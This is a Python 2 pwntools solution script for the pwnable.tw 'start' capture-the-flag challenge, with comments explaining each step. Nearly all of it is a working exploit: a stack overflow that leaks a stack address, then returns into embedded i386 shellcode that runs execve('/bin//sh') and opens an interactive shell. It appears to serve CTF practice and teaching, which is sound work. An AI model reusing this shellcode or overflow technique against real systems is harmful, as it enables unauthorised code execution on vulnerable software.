from pwn import *

# Solution script for the pwnable.tw "start" challenge (CTF practice target).
# Python 2 syntax (print statements, byte data held in str); needs pwntools.
# The technique only works against a binary built without the usual
# mitigations: it overwrites a saved return address (no stack canary), reuses
# a fixed code address (no PIE) and runs bytes placed on the stack (no NX).

# Start the local copy of the challenge binary as a child process.
s = process("./start")
# Alternative target: the hosted challenge instance (disabled here).
#s = remote("chall.pwnable.tw",10000)

# 25 bytes of i386 machine code: xor eax,eax; push eax; push "//sh";
# push "/bin"; mov ebx,esp; push eax; push ebx; mov ecx,esp; mov edx,eax;
# mov al,0xb; int 0x80 -- i.e. execve("/bin//sh", argv, NULL) via int 0x80.
shell = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"


# Parsed ELF handle; `elf` is not referenced again in this script.
elf = ELF("./start")

# Hard-coded code address inside the binary, used as the first return target.
# NOTE(review): the instructions at this address are not shown on this page;
# judging by how the reply is used below, execution presumably resumes at code
# that writes stack contents back to the client -- confirm in a disassembler.
doldol = 0x08048087


# Wait for the program's prompt before sending anything.
print s.recvuntil("Let's start the CTF:")


# Stage 1: 20 filler bytes followed by a 4-byte little-endian address (p32).
# NOTE(review): 20 is presumably the distance from the input buffer to the
# saved return address -- confirm against the binary.
pay = "A" * 20
pay += p32(doldol)

s.send(pay)

# Interpret the first 4 bytes of the reply as a little-endian 32-bit value and
# treat it as a stack address. recv(4) may return fewer than 4 bytes, in which
# case u32() fails.
stack = u32(s.recv(4))
print "stack address : %s" %str(hex(stack))


# Stage 2: 20 filler bytes, then a return address of (leaked value + 0x14),
# then the machine code itself (57 bytes in total).
# NOTE(review): 0x14 is presumably the offset at which the bytes following the
# return address land relative to the leaked pointer -- confirm.
pay = "B" * 20
pay += p32(stack+0x14)
# xor eax,eax; xor ebx,ebx; xor ecx,ecx; xor edx,edx -- zero four registers
# before the shellcode runs.
pay += "\x31\xC0\x31\xDB\x31\xC9\x31\xD2"
pay += shell

s.send(pay)


# Print whatever the process sends back (up to 1024 bytes), then hand the
# connection over to the terminal.
print s.recv(1024)
s.interactive()

:))
